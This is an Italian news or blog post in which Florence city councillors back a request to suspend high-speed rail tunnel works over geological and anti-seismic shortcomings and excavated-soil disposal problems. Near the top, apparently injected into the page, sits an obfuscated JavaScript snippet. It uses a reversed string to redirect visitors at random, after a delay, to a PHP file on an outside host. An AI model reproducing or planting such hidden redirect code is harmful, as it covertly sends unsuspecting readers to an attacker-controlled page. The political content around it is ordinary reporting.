Tav. Nessun protocollo può essere firmato. Manca l'osservanza delle norme antisismiche

image_pdfimage_print
$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and(this)” href=”http://www.altracitta.org/wp-content/uploads/2011/07/Terremoto_strada1.jpg”>

“Sosteniamo l’azione del Comitato NoTunnelTav e di Italia Nostra che oggi hanno depositato la richiesta di sospensione dei lavori del nodo fiorentino AV per nuove pesanti irregolarità rilevate nel progetto. ” Lo affermano i consiglieri De Zordo e Grassi, presenti alla conferenza stampa che si è tenuta stamattina in Palazzo Vecchio.

“Il Genio civile ha rilevato il 19 luglio ultimo scorso gravi criticità nella relazione geologica e geofisica allegata al progetto: le indagini geologiche utilizzate non sembrano possedere i requisiti richiesti dalla normativa vigente. Questo si aggiunge al nodo irrisolto dei 3 milioni di mc delle terre di scavo che non possono essere conferite come previsto a Santa Barbara” proseguono i consiglieri Grassi e De Zordo.

“Comune, Provincia e Regione Toscana non procedano dunque alla firma di un Protocollo che prescinde da queste e altre criticità che mettono a rischio la salute e l’integrità del nostro territorio,- concludono i consiglieri –  Nessuna compensazione economica può essere accettata per risarcire i danni prevedibili. La lezione del Mugello deve pur insegnare qualcosa.”

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *